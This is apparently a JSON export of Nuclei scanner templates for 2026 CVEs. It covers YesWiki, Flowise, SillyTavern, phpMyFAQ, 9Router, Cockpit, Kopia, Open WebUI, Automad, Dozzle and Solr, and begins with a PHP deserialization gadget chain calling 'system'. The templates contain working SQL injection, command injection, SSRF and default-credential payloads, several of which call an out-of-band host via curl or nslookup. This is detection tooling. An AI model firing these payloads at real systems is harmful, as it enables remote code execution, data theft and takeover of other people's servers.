{{ceselector_cookie}}=O%3A28%3A%22Monolog%5CHandler%5CGroupHandler%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00handlers%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A6%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3Br%3A3%3Bs%3A13%3A%22%00%2A%00bufferSize%22%3Bi%3A1%3Bs%3A14%3A%22%00%2A%00bufferLimit%22%3Bi%3A0%3Bs%3A9%3A%22%00%2A%00buffer%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22Monolog%5CLogRecord%22%3A2%3A%7Bs%3A5%3A%22level%22%3BE%3A19%3A%22Monolog%5CLevel%3ADebug%22%3Bs%3A5%3A%22mixed%22%3Bs%3A2%3A%22id%22%3B%7D%7Ds%3A14%3A%22%00%2A%00initialized%22%3Bb%3A1%3Bs%3A13%3A%22%00%2A%00processors%22%3Ba%3A3%3A%7Bi%3A0%3Bs%3A15%3A%22get_object_vars%22%3Bi%3A1%3Bs%3A3%3A%22end%22%3Bi%3A2%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'regex(\"uid=\\\\d+\\\\([a-z_][a-z0-9_-]*\\\\)\\\\s+gid=\\\\d+\\\\([a-z_][a-z0-9_-]*\\\\)\", body)'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        group: 0\n        regex:\n          - \"uid=\\\\d+\\\\([a-zA-Z0-9_-]+\\\\)\\\\s+gid=\\\\d+\\\\([a-zA-Z0-9_-]+\\\\)[^\\\\n]*\"\n# digest: 4a0a0047304502205db1b09cf60566af7590b089e03c46c03033652d16af7773d3fedddf66e3db2f022100cff8b4243198fb274ed03cb722f94a61ee3320fbe5b756f80b29e8e1d321b390:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-46725.yaml","vuln_id":"cve-2026-46725"},{"raw":"id: CVE-2026-46670\n\ninfo:\n  name: YesWiki < 4.6.4 - Unauthenticated SQL Injection\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    YesWiki before version 4.6.4 contains an unauthenticated SQL injection vulnerability in the Bazar form-import path. The bn_id_nature parameter in FormManager::create() is concatenated into an INSERT statement without sanitization, allowing unauthenticated attackers to inject arbitrary SQL and read the full database including password hashes.\n  impact: |\n    An unauthenticated attacker can dump the entire database contents including usernames, emails, and hashed passwords from the yeswiki_users table.\n  remediation: |\n    Update YesWiki to version 4.6.4 or later.\n  reference:\n    - https://github.com/YesWiki/yeswiki/security/advisories/GHSA-jwvv-qr7q-cv8j\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-46670\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-46670\n    epss-score: 0.01905\n    epss-percentile: 0.78831\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: yeswiki\n    product: yeswiki\n    shodan-query: http.html:\"YesWiki\"\n    fofa-query: body=\"YesWiki\"\n  tags: cve,cve2026,yeswiki,sqli,unauth,intrusive\n\nvariables:\n  label: \"nuclei_{{rand_text_alphanumeric(8)}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?BazaR&vue=formulaire\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(to_lower(body), \"bazar\", \"yeswiki\")'\n        internal: true\n        condition: and\n\n  - raw:\n      - |\n        POST /?BazaR&vue=formulaire HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        imported-form%5B7790000%2BASCII%28SUBSTRING%28VERSION%28%29%2C1%2C1%29%29%5D=%7B%22bn_label_nature%22%3A%22{{label}}%22%2C%22bn_template%22%3A%22%22%2C%22bn_description%22%3A%22%22%2C%22bn_condition%22%3A%22%22%7D\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 302'\n        internal: true\n        condition: and\n\n  - raw:\n      - |\n        GET /?api/forms HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'regex(\"\\\"779004[89]\\\":\\\\{|\\\"779005[0-7]\\\":\\\\{\", body)'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '\"(779004[89]|779005[0-7])\":\\{\"bn_id_nature\"'\n# digest: 4a0a00473045022100a10fef54d7a344600804baafb82e26914ff53662fbd631a2304ba46840e83e0202201f9f23d5d2b627814658e684cb3c4aabf27f54a4009e6f8cb29c8e57b573a910:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-46670.yaml","vuln_id":"cve-2026-46670"},{"raw":"id: CVE-2026-46442\n\ninfo:\n  name: Flowise < 3.1.2 - node-custom-function Unauthorized RCE\n  author: DhiyaneshDk,princechaddha\n  severity: critical\n  description: |\n    Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, POST /api/v1/node-custom-function lacks route-level authorization, allowing any authenticated user or API key to submit arbitrary JavaScript to the Custom JS Function node. When E2B_APIKEY is not configured — the common deployment case — Flowise executes this code inside a NodeVM sandbox. This sandbox can be escaped, allowing an attacker to reach the host process object and execute system commands via child_process. The result is authenticated remote code execution on the Flowise server host. This issue has been patched in version 3.1.2.\n  impact: |\n    Authenticated attackers can execute arbitrary system commands on the Flowise server, leading to full server compromise.\n  remediation: |\n    Update to version 3.1.2 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-46442\n    - https://github.com/FlowiseAI/Flowise\n    - https://github.com/FlowiseAI/Flowise/security/advisories\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 9.9\n    cve-id: CVE-2026-46442\n    cwe-id: CWE-78\n    epss-score: 0.3634\n    epss-percentile: 0.98415\n    cpe: cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*\n  metadata:\n    verified: false\n    max-request: 2\n    vendor: flowiseai\n    product: flowise\n    shodan-query: http.title:\"Flowise\"\n    fofa-query: title=\"Flowise\"\n  tags: cve,cve2026,flowise,cmdi,rce,oob,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Flowise\"\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/node-custom-function HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        x-request-from: internal\n\n        {\"functionBody\":\"require('child_process').execSync('nslookup {{interactsh-url}}');return '';\",\"nodeData\":{\"inputs\":{}}}\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n# digest: 4b0a00483046022100b462db97d32628a44476b7f7c91d3964014fbe2be67dce0d86e725c8b67f1487022100c5c471678cdc078da727d9cd27d905caab705de2a400c7ae0d357a1def51858e:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-46442.yaml","vuln_id":"cve-2026-46442"},{"raw":"id: CVE-2026-46372\n\ninfo:\n  name: SillyTavern - Server-Side Request Forgery\n  author: theamanrawat\n  severity: high\n  description: |\n    SillyTavern versions up to and including 1.17.0 expose the /api/search/searxng endpoint, which accepts an attacker-controlled baseUrl parameter and uses it directly to build outbound server-side fetch requests. An authenticated low-privilege user can point baseUrl at an internal or loopback HTTP service and receive the full response body, enabling read access to internal services, cloud metadata endpoints, and private network resources.\n  remediation:\n    Upgrade SillyTavern to version 1.18.0 or later, which introduces a Private Request Whitelisting filter. Enable and properly configure the filter when hosting over a network.\n  reference:\n    - https://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-qg89-qwwh-5f3j\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-46372\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N\n    cvss-score: 8.5\n    cve-id: CVE-2026-46372\n    epss-score: 0.00866\n    epss-percentile: 0.57145\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 3\n    shodan-query: http.title:\"SillyTavern\"\n    fofa-query: title=\"SillyTavern\"\n  tags: cve,cve2026,sillytavern,nodejs,ssrf,unauthenticated\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<title>SillyTavern</title>\"\n        internal: true\n\n  - raw:\n      - |\n        GET /csrf-token HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        POST /api/search/searxng HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        X-CSRF-Token: {{csrf_token}}\n\n        {\"baseUrl\":\"http://{{interactsh-url}}/\",\"query\":\"x\"}\n\n    extractors:\n      - type: json\n        name: csrf_token\n        part: body\n        internal: true\n        json:\n          - '.token'\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"GET\"\n# digest: 4a0a00473045022100a168e15c4fa7d0912d56b506ae99d7df97c0ac5231928eb0f6247562af7484d302202edb9d453d4d5413c314ac707f2d18d54340dd4b3602375feab27438d8ac2fb4:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-46372.yaml","vuln_id":"cve-2026-46372"},{"raw":"id: CVE-2026-46364\n\ninfo:\n  name: phpMyFAQ <= 4.1.1 - SQL Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    phpMyFAQ before 4.1.2 contains an unauthenticated SQL injection vulnerability in BuiltinCaptcha::garbageCollector() and BuiltinCaptcha::saveCaptcha() methods that interpolate unsanitized User-Agent headers into DELETE and INSERT queries. Unauthenticated attackers can exploit the public GET /api/captcha endpoint by crafting malicious User-Agent headers to perform time-based blind SQL injection, extracting sensitive data including user credentials, admin tokens, and SMTP credentials from the database.\n  impact: |\n    Unauthenticated attackers can extract sensitive data including user credentials, admin tokens, and SMTP credentials from the database.\n  remediation: |\n    Upgrade phpMyFAQ to version 4.1.2 or later.\n  reference:\n    - https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-289f-fq7w-6q2w\n    - https://www.phpmyfaq.de\n    - http://nvd.nist.gov/vuln/detail/CVE-2026-46364\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cwe-id: CWE-89\n    epss-score: 0.01709\n    epss-percentile: 0.76326\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.favicon.hash:-1194891278\n    fofa-query: app=\"phpMyFAQ\"\n  tags: cve,cve2026,sqli,phpmyfaq\n\nhttp:\n  - raw:\n      - |\n        @timeout: 20s\n        GET /api/captcha HTTP/1.1\n        Host: {{Hostname}}\n        User-Agent: x' OR SLEEP(8) OR 'x\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration >= 8'\n          - 'status_code == 200'\n          - 'contains(body, \"Truncated incorrect DOUBLE\")'\n        condition: and\n# digest: 4a0a00473045022100e81697e7176290c3959cfa5675ae1eb518e3c14dd2e9cca938b675b44f9a36f80220331a080d3a9199e3e97dda7152be25d71e8bc558e277a227f926752a01b3e6c5:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-46364.yaml","vuln_id":"cve-2026-46364"},{"raw":"id: CVE-2026-46339\n\ninfo:\n  name: 9Router <= 0.4.36 - Unauthenticated RCE\n  author: 0x_Akoko\n  severity: critical\n  description: |\n   9Router <= 0.4.36 middleware only guards 8 explicitly listed routes, leaving /api/cli-tools/* and /api/mcp/* entirely unauthenticated. An attacker can POST to /api/cli-tools/cowork-settings to register a custom MCP plugin with attacker-controlled command and args stored verbatim into globalThis, then GET /api/mcp/{name}/sse to trigger spawn() with the stored command resulting in unauthenticated remote code execution.\n  impact: |\n   Full unauthenticated RCE as the 9Router process user, exposing API keys, Claude tokens, AWS credentials, and all stored MCP plugin configuration.\n  remediation: |\n   Upgrade to 9Router 0.4.37 or later.\n  reference:\n    - https://github.com/decolua/9router/security/advisories/GHSA-fhh6-4qxv-rpqj\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-46339\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-46339\n    epss-score: 0.03352\n    epss-percentile: 0.88158\n    cwe-id: CWE-78\n  metadata:\n    verified: true\n    max-request: 3\n    product: 9router\n    vendor: decolua\n  tags: cve,cve2026,9router,rce,mcp,unauth,critical\n\nvariables:\n  plugin_name: \"{{randstr}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /api/version HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"currentVersion\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/cli-tools/cowork-settings HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"baseUrl\":\"x\",\"apiKey\":\"x\",\"models\":[\"x\"],\"plugins\":[],\"localPlugins\":[],\"customPlugins\":[{\"name\":\"{{plugin_name}}\",\"command\":\"curl\",\"args\":[\"-s\",\"{{interactsh-url}}\"]}]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"success\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /api/mcp/{{plugin_name}}/sse HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"http\")'\n        condition: and\n# digest: 4a0a00473045022052182c92ed7aba0892b72b1996313ef266bd3a6dc732efbf08dbaa7207600b65022100f55480945abc1effdd7277ad4980e731bffebb87fa26314601893094d745c738:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-46339.yaml","vuln_id":"cve-2026-46339"},{"raw":"id: CVE-2026-4631\n\ninfo:\n  name: Cockpit Web Console < 360 - Remote Code Execution\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Cockpit's remote login feature passes user-supplied hostnames and usernames from the web interface to the SSH client without validation or sanitization. An attacker with network access to the Cockpit web service can craft a single HTTP request to the login endpoint that injects malicious SSH options or shell commands, achieving code execution on the Cockpit host without valid credentials. The injection occurs during the authentication flow before any credential verification takes place, meaning no login is required to exploit the vulnerability.\n  impact: |\n    Attackers can execute arbitrary code on the Cockpit host without valid credentials, leading to full system compromise.\n  remediation: Update to the latest version with input validation and sanitization for SSH parameters.\n  reference:\n    - https://github.com/cockpit-project/cockpit/security/advisories/GHSA-m4gv-x78h-3427\n    - https://github.com/cockpit-project/cockpit/commit/9d0695647\n    - https://github.com/allisonkarlitskaya/ferny/commit/44ec511c99\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-4631\n    epss-score: 0.1548\n    epss-percentile: 0.96647\n    cwe-id: CWE-78\n    cpe: cpe:2.3:a:cockpit-project:cockpit:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: cockpit-project\n    product: cockpit\n    shodan-query: title:\"Cockpit\"\n    fofa-query: title=\"Cockpit\"\n  tags: cve,cve2026,cockpit,rce,unauthenticated,vkev\n\nflow: http(1) && http(2)\n\nvariables:\n  filename: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n  - raw:\n      - |\n        GET /cockpit+=-oProxyCommand=echo%20CVE-2026-4631%20%3E%20%2Fusr%2Fshare%2Fcockpit%2Fstatic%2F{{filename}}.txt%20%23/login HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic Og==\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 401'\n          - 'contains(body, \"authentication-failed\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /cockpit/static/{{filename}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"CVE-2026-4631\")'\n        condition: and\n# digest: 4a0a00473045022053455c2436c71b07097ee4f77da97f52b16f5481390ee89ccfb922335373c89b0221008f15c421a23f33b69eda894823b92937a14391c5701b8419d69b1672e80ef737:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-4631.yaml","vuln_id":"cve-2026-4631"},{"raw":"id: CVE-2026-45695\n\ninfo:\n  name: Kopia Server 0.23.0 - Remote Code Execution\n  author: kenlacroix\n  severity: critical\n  description: |\n    Kopia before version 0.23.0 allows unauthenticated remote code execution when started in server mode with the --without-password flag. When the /api/v1/repo/exists endpoint is exposed, it enables instantiation of the SFTP storage backend with user-supplied sshArguments. Due to improper argument parsing, an attacker may inject arbitrary SSH options such as -oProxyCommand, resulting in execution of arbitrary commands as the server process.\n  impact: |\n    An unauthenticated attacker can execute arbitrary commands as the Kopia server process (often root in a container), leading to full host compromise and access to all managed backup data.\n  remediation: |\n    Upgrade to Kopia 0.23.0 or later, which refuses to bind an unauthenticated server to a non-loopback address. Do not expose the server with --without-password on untrusted networks.\n  reference:\n    - https://github.com/kopia/kopia/security/advisories/GHSA-2q4c-3mrw-63c3\n    - https://github.com/kopia/kopia/pull/5354\n    - https://orca.security/resources/blog/kopia-backup-rce-vulnerability/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-45695\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-45695\n    epss-score: 0.0161\n    epss-percentile: 0.74867\n    cwe-id: CWE-88\n  metadata:\n    max-request: 1\n    vendor: kopia\n    product: kopia\n    shodan-query: http.favicon.hash:952466528\n    fofa-query: icon_hash==\"952466528\"\n  tags: cve,cve2026,kopia,rce,ssh,injection,sftp,intrusive,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/repo/exists HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"storage\":{\"type\":\"sftp\",\"config\":{\"path\":\"/{{rand_base(6)}}\",\"host\":\"127.0.0.1\",\"port\":22,\"username\":\"{{rand_base(6)}}\",\"externalSSH\":true,\"sshArguments\":\"-oProxyCommand=curl${IFS}{{interactsh-url}}\"}}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'unable to open SFTP storage'\n          - 'error\":'\n        condition: and\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - 'User-Agent: curl'\n# digest: 4a0a004730450220446b4d6b11e9b7cf50dd69c6de2900f0c3ee6fb0c45d607ce0554940cb4ad7a4022100bcaf5c5ce9294b79589abec2156c0ecc8faac35311dd0f1de752b0ff4b7c0135:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-45695.yaml","vuln_id":"cve-2026-45695"},{"raw":"id: CVE-2026-45397\n\ninfo:\n  name: Open WebUI < 0.9.5 - Information Disclosure\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    Open WebUI < 0.9.5 contains an information disclosure vulnerability caused by unauthenticated access to GET /api/v1/retrieval/ endpoint, letting remote attackers retrieve live RAG pipeline configuration without authorization, exploit requires no authentication.\n  impact: |\n    Remote attackers can access sensitive configuration data without authentication, potentially aiding further attacks.\n  remediation: |\n    Update to version 0.9.5 or later.\n  reference:\n    - https://github.com/open-webui/open-webui/security/advisories/GHSA-65pg-qhhw-mxwg\n    - https://github.com/open-webui/open-webui\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-45397\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cwe-id: CWE-862\n    cve-id: CVE-2026-45397\n    epss-score: 0.0075\n    epss-percentile: 0.53458\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: openwebui\n    product: open-webui\n    shodan-query: title:\"Open WebUI\"\n    fofa-query: title=\"Open WebUI\"\n  tags: cve,cve2026,open-webui,exposure,misconfig\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/retrieval/\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"CHUNK_SIZE\", \"RAG_EMBEDDING_MODEL\", \"RAG_TEMPLATE\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a00463044022062bc3d632091dba7d7bdbfdef835494316aff62c2ca3d954e61b43e701d1fca602207fc21baa989b1499e60ad81de881a4092ca8ec38eb039e22ecd7bd133df9727d:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-45397.yaml","vuln_id":"cve-2026-45397"},{"raw":"id: CVE-2026-45332\n\ninfo:\n  name: Automad < 2.0.0-beta.28 - Unauthenticated Admin Password Hash Disclosure\n  author: str4k3r\n  severity: high\n  description: |\n    Automad 2.0.0-alpha.1 to 2.0.0-beta.27 contains a broken access control vulnerability caused by publicly accessible /_api/user-collection/create-first-user endpoint returning full serialized user data, letting unauthenticated attackers retrieve bcrypt password hashes of all administrator accounts, exploit requires the endpoint to remain publicly accessible after initial setup.\n  impact: |\n    Unauthenticated attackers can retrieve bcrypt password hashes of all administrator accounts, risking credential compromise and full system takeover.\n  remediation: |\n    Upgrade to version 2.0.0-beta.28 or later.\n  reference:\n    - https://github.com/marcantondahmen/automad/security/advisories/GHSA-xm76-r88j-vm3g\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-45332\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-45332\n    epss-score: 0.0134\n    epss-percentile: 0.70062\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 2\n    product: automad\n    vendor: marcantondahmen\n  tags: cve,cve2026,automad,exposure,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /dashboard/login HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: csrf_token\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - 'name=\"csrf\" content=\"([a-f0-9]+)\"'\n\n  - raw:\n      - |\n        POST /_api/user-collection/create-first-user HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        __csrf__={{csrf_token}}&username=nuclei_check&password1=Nuclei-Check-Pw1!&password2=Nuclei-Check-Pw1!&email=nuclei-check%40example.local\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'passwordHash'\n          - 'accounts.php'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402206b2f2eca50d0241a36c2fbe78fb2c23bc5f86576e4e47655f3b2d9a03eaf9d9a02207501a15c56688c9f9a2b8805891be5be5475057269639a859838e5685b1e9e6e:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-45332.yaml","vuln_id":"cve-2026-45332"},{"raw":"id: CVE-2026-45298\n\ninfo:\n  name: Dozzle - Server Side Request Forgery\n  author: theamanrawat\n  severity: high\n  description: |\n    Dozzle prior to 10.5.2 contains a server-side request forgery caused by unauthenticated access to POST /api/notifications/test-webhook forwarding attacker-controlled URLs, letting remote attackers send arbitrary HTTP POST requests and receive response data, exploit requires no authentication.\n  impact: |\n    Remote attackers can send arbitrary HTTP POST requests and retrieve response data, potentially exposing internal services or sensitive information.\n  remediation: |\n    Update to version 10.5.2 or later.\n  reference:\n    - https://github.com/amir20/dozzle/security/advisories/GHSA-3v9w-6365-9w54\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-45298\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2026-45298\n    epss-score: 0.01491\n    epss-percentile: 0.72974\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2026,ssrf,dozzle,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /api/notifications/test-webhook HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"url\":\"http://{{interactsh-url}}\",\"headers\":{}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - 'http'\n\n      - type: word\n        part: body\n        words:\n          - '\"statusCode\":200'\n\n      - type: status\n        status:\n          - 200\n# digest: 490a004630440220173ba3d1229ee02d1dba6245e8413ac36ea588615bc9fc52941868fd46f72991022058fb5e4836d51395abe89b08628650518de6b94f913dedcee338feffe074f079:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-45298.yaml","vuln_id":"cve-2026-45298"},{"raw":"id: CVE-2026-44825\n\ninfo:\n  name: Apache Solr 9.4.0-9.10.1 / 10.0.0 - Hardcoded Default Credentials\n  author: pdteam,0x_Akoko\n  severity: high\n  description: |\n    Apache Solr 9.4.0 through 9.10.1 and 10.0.0 contain a hardcoded credentials vulnerability caused by default Basic Authentication template users in bin/solr auth enable, letting remote attackers gain full administrative access. Exploit requires use of default template users.\n  impact: |\n    Remote attackers can gain full administrative access to the cluster using default credentials.\n  remediation: |\n    Upgrade to versions 9.11.0, 10.1.0 or later; alternatively, delete template users or change their passwords in security.json.\n  reference:\n    - https://lists.apache.org/thread/5xg6xr99glocp3zsg9ht2zlbwlrst7ch\n    - http://www.openwall.com/lists/oss-security/2026/05/29/6\n    - https://github.com/shinthink/solrradar\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-44825\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.1\n    cve-id: CVE-2026-44825\n    epss-score: 0.02892\n    epss-percentile: 0.86306\n    cwe-id: CWE-798\n  metadata:\n    verified: true\n    max-request: 6\n    shodan-query: product:\"Apache Solr\" port:8983\n    fofa-query: app=\"Apache-Solr\" || title=\"Solr Admin\"\n  tags: cve,cve2026,apache,solr,default-login,vkev\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /solr/admin/info/system?wt=json HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - '(status_code == 200 && contains_any(body, \"solr-spec-version\", \"lucene\", \"solrHome\")) || ((status_code == 401 || status_code == 403) && contains_any(to_lower(header), \"solr\", \"basic\"))'\n        internal: true\n\n  - raw:\n      - |\n        GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 401 || status_code == 403'\n        internal: true\n\n  - raw:\n      - |\n        GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic {{auth}}\n\n    payloads:\n\n      username:\n        - solr\n        - admin\n        - search\n        - index\n\n      auth:\n        - c29scjpTb2xyUm9ja3M=\n        - YWRtaW46U29sclJvY2tz\n        - c2VhcmNoOlNvbHJSb2Nrcw==\n        - aW5kZXg6U29sclJvY2tz\n\n    attack: pitchfork\n\n    stop-at-first-match: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"responseHeader\", \"status\")'\n          - '!contains(body, \"Authentication\")'\n        condition: and\n\n    extractors:\n      - type: dsl\n        dsl:\n          - username\n\n      - type: regex\n        group: 1\n        regex:\n          - '\"name\"\\s*:\\s*\"([a-zA-Z0-9_-]+)\"'\n# digest: 490a0046304402204a2461141adb318fed73d443137ae7e5de014559238b52bf24f233eec08899d2022077c44019506a05267d96b189dfa24affb00728589bf0a10eef34618a1cfe201d:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-44825.yaml","vuln_id":"cve-2026-44825"},{"raw":"id: CVE-2026-44551\n\ninfo:\n  name: Open WebUI 'LDAP Empty Password' - Authentication Bypass\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the LDAP authentication endpoint does not validate that the submitted password is non-empty before performing a Simple Bind against the LDAP server. The LdapForm Pydantic model accepts password: str with no minimum length constraint, so an empty string passes validation. The subsequent Connection.bind() call succeeds on vulnerable LDAP servers, and the application issues a full session token for the target user. This vulnerability is fixed in 0.9.0.\n  impact: |\n    Attackers can authenticate without a password and obtain full session tokens, leading to unauthorized access.\n  remediation: |\n    Update to version 0.9.0 or later.\n  reference:\n    - https://github.com/open-webui/open-webui/security/advisories/GHSA-2r4p-jpmg-48f4\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-44551\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: 